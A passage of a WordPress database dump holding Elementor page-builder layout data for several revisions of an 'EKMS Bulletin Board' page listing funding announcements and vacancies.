\\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"f713c51\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"ekms_bulletin\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"4096\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_columns\":\"1\",\"custom_posts_per_page\":10,\"custom_column_gap\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"pagination_type\":\"numbers_and_prev_next\",\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":75,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"4f69fff\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false}]'),(29291,4129,'_elementor_pro_version','3.3.6'),(29292,4130,'_elementor_edit_mode','builder'),(29293,4130,'_elementor_template_type','wp-page'),(29294,4130,'_elementor_version','3.4.0'),(29295,4130,'_wp_page_template','default'),(29296,4130,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\"}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb8563c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e7317f1\"}]},\"elements\":[{\"id\":\"007d245\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2301b1e\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"f713c51\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"ekms_bulletin\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"4096\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_columns\":\"1\",\"custom_posts_per_page\":10,\"custom_column_gap\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"pagination_type\":\"numbers_and_prev_next\",\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":75,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"4f69fff\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false}]'),(29298,4130,'_elementor_pro_version','3.3.6'),(29299,4131,'_elementor_edit_mode','builder'),(29300,4131,'_elementor_template_type','wp-page'),(29301,4131,'_elementor_version','3.4.0'),(29302,4131,'_wp_page_template','default'),(29303,4131,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\"}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb8563c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e7317f1\"}]},\"elements\":[{\"id\":\"007d245\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0a3f9d5\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"500791b\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"bb6259c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":57.72399999999999664623828721232712268829345703125},\"elements\":[{\"id\":\"3ade5ef\",\"elType\":\"widget\",\"settings\":{\"title\":\"Announcements\\/Vacancies\",\"header_size\":\"h4\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_text_decoration\":\"underline\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"087a2ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":21.69200000000000017053025658242404460906982421875},\"elements\":[{\"id\":\"4638ad1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Posted\",\"header_size\":\"h4\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_text_decoration\":\"underline\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"c515565\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":19.60900000000000176214598468504846096038818359375},\"elements\":[{\"id\":\"ecf2102\",\"elType\":\"widget\",\"settings\":{\"title\":\"Closed\",\"header_size\":\"h4\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_text_decoration\":\"underline\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"2301b1e\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"f713c51\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"ekms_bulletin\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"4096\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_columns\":\"1\",\"custom_posts_per_page\":10,\"custom_column_gap\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"pagination_type\":\"numbers_and_prev_next\",\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":75,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"4f69fff\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false}]'),(29305,4131,'_elementor_pro_version','3.3.6'),(29307,4132,'_elementor_edit_mode','builder'),(29308,4132,'_elementor_template_type','wp-page'),(29309,4132,'_elementor_version','3.4.0'),(29310,4132,'_wp_page_template','default'),(29311,4132,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\"}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb8563c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e7317f1\"}]},\"elements\":[{\"id\":\"007d245\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0a3f9d5\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"500791b\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"bb6259c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":57.72399999999999664623828721232712268829345703125},\"elements\":[{\"id\":\"3ade5ef\",\"elType\":\"widget\",\"settings\":{\"title\":\"Announcements\\/Vacancies\",\"header_size\":\"h4\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_text_decoration\":\"underline\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"087a2ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":21.69200000000000017053025658242404460906982421875},\"elements\":[{\"id\":\"4638ad1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Posted\",\"header_size\":\"h4\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_text_decoration\":\"underline\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"c515565\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":19.60900000000000176214598468504846096038818359375},\"elements\":[{\"id\":\"ecf2102\",\"elType\":\"widget\",\"settings\":{\"title\":\"Closed\",\"header_size\":\"h4\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_text_decoration\":\"underline\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"2301b1e\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"f713c51\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"ekms_bulletin\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"4096\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_columns\":\"1\",\"custom_posts_per_page\":10,\"custom_column_gap\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"pagination_type\":\"numbers_and_prev_next\",\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":75,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"4f69fff\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false}]'),(29313,4132,'_elementor_pro_version','3.3.6'),(29314,4133,'_elementor_edit_mode','builder'),(29315,4133,'_elementor_template_type','wp-page'),(29316,4133,'_elementor_version','3.4.0'),(29317,4133,'_wp_page_template','default'),(29318,4133,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\"}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb8563c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e7317f1\"}]},\"elements\":[{\"id\":\"007d245\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0a3f9d5\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"500791b\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"bb6259c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":57.72399999999999664623828721232712268829345703125},\"elements\":[{\"id\":\"3ade5ef\",\"elType\":\"widget\",\"settings\":{\"title\":\"Announcements\\/Vacancies\",\"header_size\":\"h4\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_text_decoration\":\"underline\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"087a2ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":21.69200000000000017053025658242404460906982421875},\"elements\":[{\"id\":\"4638ad1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Posted\",\"header_size\":\"h4\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_text_decoration\":\"underline\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"c515565\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":19.60900000000000176214598468504846096038818359375},\"elements\":[{\"id\":\"ecf2102\",\"elType\":\"widget\",\"settings\":{\"title\":\"Closed\",\"header_size\":\"h4\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_text_decoration\":\"underline\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"2301b1e\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"f713c51\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"ekms_bulletin\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"4096\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_columns\":\"1\",\"custom_posts_per_page\":10,\"custom_column_gap\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"pagination_type\":\"numbers_and_prev_next\",\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":75,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"4f69fff\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false}]'),(29320,4133,'_elementor_pro_version','3.3.6'),(29321,4134,'_elementor_edit_mode','builder'),(29322,4134,'_elementor_template_type','wp-page'),(29323,4134,'_elementor_version','3.4.0'),(29324,4134,'_wp_page_template','default'),(29325,4134,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\"}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This bulletin provides a space for funding announcements, jobs, and other related openings.\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb8563c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e7317f1\"}]},\"elements\":[{\"id\":\"007d245\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0a3f9d5\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"500791b\"}],\"structure\":\"30\",\"motion_fx_motion_fx_scrolling\":\"yes\",\"motion_fx_devices\":[\"desktop\"]},\"elements\":[{\"id\":\"bb6259c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":57.72399999999999664623828721232712268829345703125},\"elements\":[{\"id\":\"3ade5ef\",\"elType\":\"widget\",\"settings\":{\"title\":\"Announcements\\/Vacancies\",\"header_size\":\"h4\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_text_decoration\":\"underline\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"087a2ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":20.28999999999999914734871708787977695465087890625},\"elements\":[{\"id\":\"4638ad1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Posted\",\"header_size\":\"h4\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_text_decoration\":\"underline\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"c515565\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":21.010999999999999232613845379091799259185791015625},\"elements\":[{\"id\":\"ecf2102\",\"elType\":\"widget\",\"settings\":{\"title\":\"Closed\",\"header_size\":\"h4\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_text_decoration\":\"underline\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"2301b1e\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"f713c51\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"ekms_bulletin\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"4096\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_columns\":\"1\",\"custom_posts_per_page\":10,\"custom_column_gap\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"pagination_type\":\"numbers_and_prev_next\",\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":75,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"4f69fff\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false}]'),(38596,4088,'_elementor_css','a:6:{s:4:\"time\";i:1770857715;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:10:{i:0;s:7:\"3a01213\";i:1;s:7:\"cbcaacd\";i:2;s:7:\"3a01213\";i:3;s:7:\"cbcaacd\";i:4;s:7:\"8f2b769\";i:5;s:7:\"3a01213\";i:6;s:7:\"cbcaacd\";i:7;s:7:\"3a01213\";i:8;s:7:\"cbcaacd\";i:9;s:7:\"8f2b769\";}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(29327,4134,'_elementor_pro_version','3.3.6'),(29330,4135,'_elementor_edit_mode','builder'),(29331,4135,'_elementor_template_type','wp-page'),(29332,4135,'_elementor_version','3.4.0'),(29333,4135,'_wp_page_template','default'),(29334,4135,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\"}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This bulletin provides a space for funding announcements, jobs, and other related openings.\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb8563c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e7317f1\"}]},\"elements\":[{\"id\":\"007d245\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0a3f9d5\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"500791b\"}],\"structure\":\"30\",\"motion_fx_motion_fx_scrolling\":\"yes\",\"motion_fx_devices\":[\"desktop\"]},\"elements\":[{\"id\":\"bb6259c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":57.72399999999999664623828721232712268829345703125},\"elements\":[{\"id\":\"3ade5ef\",\"elType\":\"widget\",\"settings\":{\"title\":\"Announcements\\/Vacancies\",\"header_size\":\"h4\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_text_decoration\":\"underline\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"087a2ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":20.28999999999999914734871708787977695465087890625},\"elements\":[{\"id\":\"4638ad1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Posted\",\"header_size\":\"h4\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_text_decoration\":\"underline\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"c515565\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":21.010999999999999232613845379091799259185791015625},\"elements\":[{\"id\":\"ecf2102\",\"elType\":\"widget\",\"settings\":{\"title\":\"Closed\",\"header_size\":\"h4\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_text_decoration\":\"underline\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"2301b1e\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"f713c51\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"ekms_bulletin\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"4096\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_columns\":\"1\",\"custom_posts_per_page\":10,\"custom_column_gap\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"pagination_type\":\"numbers_and_prev_next\",\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":75,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"4f69fff\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false}]'),(29336,4135,'_elementor_pro_version','3.3.6'),(29338,4136,'_elementor_edit_mode','builder'),(29339,4136,'_elementor_template_type','wp-page'),(29340,4136,'_elementor_version','3.4.0'),(29341,4136,'_wp_page_template','default'),(29342,4136,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\"}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This bulletin provides a space for funding announcements, jobs, and other related 